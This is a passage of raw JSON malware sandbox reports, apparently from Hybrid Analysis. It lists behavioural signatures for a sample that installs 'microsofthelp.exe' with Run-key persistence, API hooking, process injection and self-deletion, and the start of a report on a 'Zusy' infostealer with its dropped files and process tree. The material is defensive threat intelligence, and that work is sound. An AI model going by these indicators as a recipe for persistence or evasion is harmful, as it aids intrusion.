\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"IsValidSecurityDescriptor\" (Indicator: \"IsValidSecurityDescriptor\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"AddAce\" (Indicator: \"AddAce\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"InitializeAcl\" (Indicator: \"InitializeAcl\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetSecurityDescriptorControl\" (Indicator: \"GetSecurityDescriptorControl\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"MakeAbsoluteSD\" (Indicator: \"MakeAbsoluteSD\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"GetSecurityDescriptorSacl\" (Indicator: \"GetSecurityDescriptorSacl\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-474", "type": 2, "relevance": 1, "name": "Contains ability to access device drivers", "description": "Found string \"\\Device\\HarddiskVolume2\\Windows\\Temp\\85CB5693-B6C9-4277-9D11-4A67A44E6D8E\\DismHost.exe\" (Indicator: \"\\Device\\\"; Source: \"00000000-00000780.00000000.71722.00190000.00000004.mdmp\")\n Found string \":\\Windows\\system32\\DRIVERS\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00000780.00000001.72952.001C0000.00000004.mdmp\")\n Found string \":\\Windows\\System32\\DriverStore\\infpub.dat\" (Indicator: \"system32\\drivers\"; Source: \"00000000-00000780.00000001.72952.001C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-316", "type": 2, "relevance": 1, "name": "Contains ability to terminate a process (API string)", "description": "Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00000780.00000001.72952.00AA1000.00000020.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"ExitProcess\" (Indicator: \"ExitProcess\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")\n Found reference to API \"TerminateProcess\" (Indicator: \"TerminateProcess\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-308", "type": 2, "relevance": 1, "name": "Contains ability to delete files/directories (API string)", "description": "Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"DeleteFileA\" (Indicator: \"DeleteFile\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "string-535", "type": 2, "name": "Contains ability to write files (API string)", "description": "Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; File: \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00001432.00000001.77907.00409000.00000080.mdmp\")\n Found reference to API \"WriteFile\" (Indicator: \"WriteFile\"; Source: \"00000000-00005932.00000000.66521.00270000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-87", "relevance": 1, "name": "Imports system security related APIs", "description": "Observed import api \"AddAce\" which can \"Adds one or more access control entries (ACEs) to a specified access control list (ACL)\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"CopySid\" which can \"Copies a security identifier (SID) to a buffer\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"GetAclInformation\" which can \"Retrieves information about an access control list (ACL)\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"GetLengthSid\" which can \"Returns the length in bytes of a valid security identifier (SID)\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"GetSecurityDescriptorControl\" which can \"Retrieves a security descriptor control and revision information\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"GetSecurityDescriptorDacl\" which can \"Retrieves a pointer to the discretionary access control list (DACL) in a specified security descriptor\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"GetSecurityDescriptorGroup\" which can \"Retrieves the primary group information from a security descriptor\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"GetSecurityDescriptorOwner\" which can \"Retrieves the owner information from a security descriptor\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"GetSecurityDescriptorSacl\" which can \"Retrieves a pointer to the system access control list (SACL) in a specified security descriptor\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"GetSidLengthRequired\" which can \"Returns the length, in bytes, of the buffer required to store a SID with a specified number of subauthorities\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"GetSidSubAuthority\" which can \"Returns a pointer to a specified subauthority in a security identifier (SID)\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"InitializeAcl\" which can \"Initializes a new ACL structure\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"InitializeSecurityDescriptor\" which can \"Initializes a new security descriptor\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"InitializeSid\" which can \"Initializes a security identifier (SID)\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"IsValidSecurityDescriptor\" which can \"Determines whether the components of a security descriptor are valid\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"IsValidSid\" which can \"Validates a security identifier (SID) by verifying that the revision number is within a known range and that the number of subauthorities is less than the maximum\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"MakeAbsoluteSD\" which can \"Creates a security descriptor in absolute format by using a security descriptor in self-relative format as a template\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"SetSecurityDescriptorDacl\" which can \"Sets information in a discretionary access control list (DACL)\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"SetSecurityDescriptorGroup\" which can \"Sets the primary group information of an absolute-format security descriptor replacing any primary group information already present in the security descriptor\" [Source: DISMHOST.EXE.67A480BA.bin]\n Observed import api \"SetSecurityDescriptorOwner\" which can \"Sets the owner information of an absolute-format security descriptor\" [Source: DISMHOST.EXE.67A480BA.bin]", "origin": "Static Parser", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"microsofthelp.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Remote Access Related", "identifier": "string-531", "type": 2, "relevance": 1, "name": "Contains references to RPC protocol sequence strings", "description": "Found string \"+ncalrpc:[OLE772C2FD2894F4D3E92983168F028]\" (Indicator: \"ncalrpc\"; Source: \"00000000-00000780.00000000.71722.00190000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-0", "relevance": 10, "name": "CRC value set in PE header does not match actual value", "description": "\"DISMHOST.EXE.67A480BA.bin\" claimed CRC 103114 while the actual is CRC 81927", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-4", "relevance": 10, "name": "Entrypoint in PE header is within an uncommon section", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9\" has an entrypoint in section \".MPRESS1\"\n \"microsofthelp.exe.bin\" has an entrypoint in section \".MPRESS1\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-1", "relevance": 1, "name": "Imports suspicious APIs", "description": "RegOpenKeyA\n RegCloseKey\n RegOpenKeyExA\n RegCreateKeyA\n GetModuleFileNameA\n LoadLibraryA\n GetFileSize\n DeleteFileA\n GetProcAddress\n CreateThread\n FindFirstFileA\n WriteFile\n TerminateProcess\n CreateProcessA\n Sleep\n CreateFileA\n GetTickCount\n InternetReadFile\n InternetOpenUrlA\n InternetCloseHandle\n InternetOpenA\n SetSecurityDescriptorDacl\n RegOpenKeyExW\n OutputDebugStringW\n GetModuleFileNameW\n GetVersionExW\n OutputDebugStringA\n GetVersionExA\n GetFileAttributesW\n GetCommandLineW\n UnhandledExceptionFilter\n LoadLibraryExW\n MapViewOfFile\n CreateFileMappingW\n GetSystemDirectoryW\n GetModuleHandleA\n FindResourceExW\n GetStartupInfoA\n GetModuleHandleW\n LoadLibraryW\n GetModuleHandleExW\n CreateFileW", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MICROSOFTHELP\"; Value: \"%WINDIR%\\microsofthelp.exe\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"microsofthelp.exe.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]\n \"DISMHOST.EXE.67A480BA.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"microsofthelp.exe\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- Location: [%WINDIR%\\microsofthelp.exe]- [targetUID: 00000000-00005932]\n \"MICROSOFTHELP.EXE.67A47CFC.bin\" has type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\"- [targetUID: N/A]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" wrote 7008 bytes starting with PE header signature to file \"C:\\Windows\\microsofthelp.exe\": 4d5a40000100000002000000ffff0000ff000000000000000a000000000000000e1fff0e00ff09ff21ff014cff2157696e3332202e4558452e0d0a2440000000504500004c010300ffff174f0000000000000000ff000f030b010600003800000038000000000000001000000010000000500000000040000010000000020000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"DISMHOST.EXE.67A480BA.bin\" has section name .text with entropy \"6.11476781338\"\n \"DISMHOST.EXE.67A480BA.bin\" has section name .data with entropy \"6.44580003198\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-47", "type": 6, "relevance": 10, "name": "Possibly tries to evade analysis by sleeping many times", "description": "\"microsofthelp.exe\" (Thread ID: 5952) slept \"525\" times (threshold: 500)", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"microsofthelp.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%WINDIR%\\microsofthelp.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"FindNextFileW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindResourceW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"OpenMutexA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"OpenMutexW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"send@WS2_32.DLL\" in \"microsofthelp.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"GetProcAddress@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"Process32FirstW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"WinExec@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CreateProcessA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CopyFileA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"CopyFileW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindResourceA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"LoadResource@KERNEL32.DLL\" in \"microsofthelp.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"MICROSOFTHELP\"; Value: \"%WINDIR%\\microsofthelp.exe\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"microsofthelp.exe\" marked \"C:\\7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"microsofthelp.exe\" opened \"C:\\7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\microsofthelp.exe\" (Handle: 144)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\microsofthelp.exe\" (Handle: 144)\n \"7b5a05478b59b5382b30f75364e994877c1db6fd88625eb95ebf0ee54e5682b9.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\microsofthelp.exe\" (Handle: 144)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "binary-7", "type": 8, "relevance": 7, "name": "Drops executable files to the Windows system directory", "description": "File type \"MS-DOS executable PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows MZ for MS-DOS\" was dropped at \"%WINDIR%\\microsofthelp.exe\"", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindNextFileW@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"microsofthelp.exe\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"microsofthelp.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"microsofthelp.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814
https://hybrid-analysis.com/sample/f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814
Hybrid Analysis - Infostealers
{"size": 6775395, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814", "sha256": "f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814", "av_detect": 83, "vx_family": "Zusy.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 6, "total_signatures": 203, "extracted_files": [{"name": "_vslite.bat", "file_path": "%TEMP%\\_vslite.bat", "file_size": 249, "sha256": "8ca87851a613270013eccab1ba7d962a39841f96ae24f36f0975f3767265bd56", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "lojebo.exe (PID: 3636)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "gbp.ini", "file_path": "%TEMP%\\gbp.ini", "file_size": 104, "sha256": "30f820bb1ca6c20bcd77113c7377e01f31cdf0ec5b64864f22887d41a9bf3c7a", "type_tags": ["text"], "description": "ISO-8859 text, with no line terminators", "runtime_process": "lojebo.exe (PID: 3636)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "golfinfo.ini", "file_path": "%TEMP%\\golfinfo.ini", "file_size": 512, "sha256": "7df703d1c94ba8efe3e38c436ab89d5a5cddb6f5e10139784c467f15c7f10293", "type_tags": ["text"], "description": "Non-ISO extended-ASCII text, with very long lines (512), with no line terminators", "runtime_process": "lojebo.exe (PID: 3636)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "ywrej.exe", "file_path": "%TEMP%\\ywrej.exe", "file_size": 470680, "sha256": "7c2d9d5e26e68091332f58dea367328e10a8c2559926c506cb6103a69a0d9599", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "lojebo.exe (PID: 3636)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 279804, "sha256": "582e148306cbccf95206f31bc4e65fc83a4ce1193f7823e8f9a63c210fc6f43a", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67A48065.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005832", "name": "f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe", "normalized_path": "C:\\f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814.exe", "sha256": "f1644ff690ceac14ab04e7e712d64ec91b0c0c8df3689844a47f9a02dee0a814"}, {"uid": "00000000-00006120", "parentuid": "00000000-00005832", "name": "meorm.exe", "normalized_path": "%TEMP%\\meorm.exe", "sha256": "ae6f34ecc221197e5f7f29907e05b3afa52071c8cb40560dcdedda90f482774a"}, {"uid": "00000000-00003636", "parentuid": "00000000-00006120", "name": "lojebo.exe", "normalized_path": "%TEMP%\\lojebo.exe", "command_line": "OK", "sha256": "ae6f34ecc221197e5f7f29907e05b3afa52071c8cb40560dcdedda90f482774a"}, {"uid": "00000000-00001924", "parentuid": "00000000-00003636", "name": "ywrej.exe", "normalized_path": "%TEMP%\\ywrej.exe", "sha256": "7c2d9d5e26e68091332f58dea367328e10a8c2559926c506cb6103a69a0d9599"}, {"uid": "00000000-00001552", "parentuid": "00000000-00003636", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\_vslite.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004296", "parentuid": "00000000-00005832", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "command_line": "/c \"\"%TEMP%\\_vslite.bat\" \"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 14}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", 